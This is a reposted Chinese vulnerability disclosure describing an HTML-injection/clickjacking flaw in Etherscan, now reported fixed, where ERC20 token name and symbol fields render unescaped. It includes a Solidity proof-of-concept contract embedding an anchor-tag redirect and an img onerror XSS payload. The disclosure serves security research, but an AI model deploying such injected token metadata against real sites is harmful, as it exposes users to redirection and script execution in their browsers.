etherscan点击劫持漏洞

栏目: 编程工具 · 发布时间: 6年前

内容简介:https://etherscan.io部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。在用户访问点击页面内的合约名字,可以劫持至任意网站。

漏洞URL:如果是Web就填写此项

https://etherscan.io

简要描述:漏洞说明、利用条件、危害等

部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。

在用户访问点击页面内的合约名字,可以劫持至任意网站。

需要部署ERC20标准的合约,且在访问合约页面之前,发起一次交易。

漏洞证明:

https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns

etherscan点击劫持漏洞

漏洞利用代码:

pragma solidity ^0.4.24;

contract MyTest {

mapping(address => uint256) balances;

uint256 public totalSupply;

mapping (address => mapping (address => uint256)) allowance;

address public owner;

string public name;

string public symbol;

uint8 public decimals = 18;

event Transfer(address indexed _from, address indexed _to, uint256 _value);

function MyTest() {

name = "<a href=http://baidu.com>12321</a>";

symbol = 'ok<img src=/ onerror=alert(1)> ';

totalSupply = 100000000000000000000000000000000000;

}

function mylog(address arg0, address arg1, uint256 arg2) public {

Transfer(arg0, arg1, arg2);

}

}

修复方案:

过滤

————————————————————————————————

经与Etherscan厂商联系,目前已修复该漏洞


以上所述就是小编给大家介绍的《etherscan点击劫持漏洞》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

应用密码学:协议、算法与C源程序(原书第2版)

应用密码学:协议、算法与C源程序(原书第2版)

(美)Bruce Schneier / 吴世忠、祝世雄、张文政 等 / 机械工业出版社 / 2014-1 / 79.00

......我所读过的关于密码学最好的书......该书是美国国家安全局最不愿意见到出版的书...... —— 《Wired》 ......不朽的......令人着迷的......计算机程序员必读的密码学上决定性的著作...... —— 《Dr.Dobb's Journal》 ......该领域勿庸置疑的一本权威之作。 —— 《PC Magazine》 ..........一起来看看 《应用密码学:协议、算法与C源程序(原书第2版)》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器